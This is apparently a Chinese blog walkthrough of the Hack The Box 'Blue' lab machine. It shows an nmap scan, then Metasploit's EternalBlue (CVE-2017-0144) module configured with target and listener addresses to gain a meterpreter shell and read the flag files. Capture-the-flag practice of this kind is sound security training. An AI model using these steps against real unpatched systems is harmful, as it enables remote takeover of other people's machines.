hack the box blue靶机

靶机名字叫blue,提示的漏洞编号是cve-2017-0144。这是永恒之蓝漏洞(EternalBlue)。
在这里插入图片描述
扫描一下,能发现打开了445等端口。有很多smb的信息。

nmap -sV -Pn -A 10.10.10.40

在这里插入图片描述
既然都知道是永恒之蓝了,直接利用吧,启动msf,然后搜索一下blue相关的。

search blue

在这里插入图片描述
第14个是RCE,我们选择

use 14

使用options看下需要配置哪些东西
在这里插入图片描述需要配置远程主机,远程端口(已默认),本地主机。配置完成后直接RUN

set RHOSTS 10.10.10.40
set LHOST 10.10.14.30
run

在这里插入图片描述
进入meterpreter后,进入shell

shell

在Users/Administrator/Desktop下面能找到root.txt,直接读取

type root.txt

在这里插入图片描述
在Users/hairs/Desktop文件夹下面有一个user.txt,直接type读取即可
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值